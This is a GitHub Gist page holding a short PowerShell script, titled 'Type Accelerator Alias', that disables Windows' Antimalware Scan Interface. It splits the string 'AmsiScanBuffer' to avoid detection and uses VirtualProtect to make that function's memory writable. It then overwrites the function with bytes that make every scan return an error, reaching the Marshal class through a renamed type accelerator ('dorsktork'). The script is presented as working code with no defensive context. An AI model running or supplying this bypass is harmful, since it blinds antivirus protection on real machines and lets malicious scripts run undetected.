Created
September 8, 2021 20:51
-
-
Save reybango/e3f979bb0ab4f93e5c60a9b6bc81849f to your computer and use it in GitHub Desktop.
Type Accelerator Alias
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $MethodDefinition = " | |
| [DllImport(`"kernel32`")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport(`"kernel32`")] | |
| public static extern IntPtr GetModuleHandle(string lpModuleName); | |
| [DllImport(`"kernel32`")] | |
| public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); | |
| "; | |
| $Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru; | |
| $ABSD = 'AmsiS'+'canBuffer'; | |
| $handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll'); | |
| [IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD); | |
| [UInt32]$Size = 0x5; | |
| [UInt32]$ProtectFlag = 0x40; | |
| [UInt32]$OldProtectFlag = 0; | |
| [Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag); | |
| $buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3); | |
| [PSObject].Assembly.GetType("System.Management.Automation.TypeAccelerators")::Add('dorsktork', [system.runtime.interopservices.marshal]) | |
| [dorsktork]::copy($buf, 0, $BufferAddress, 6); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment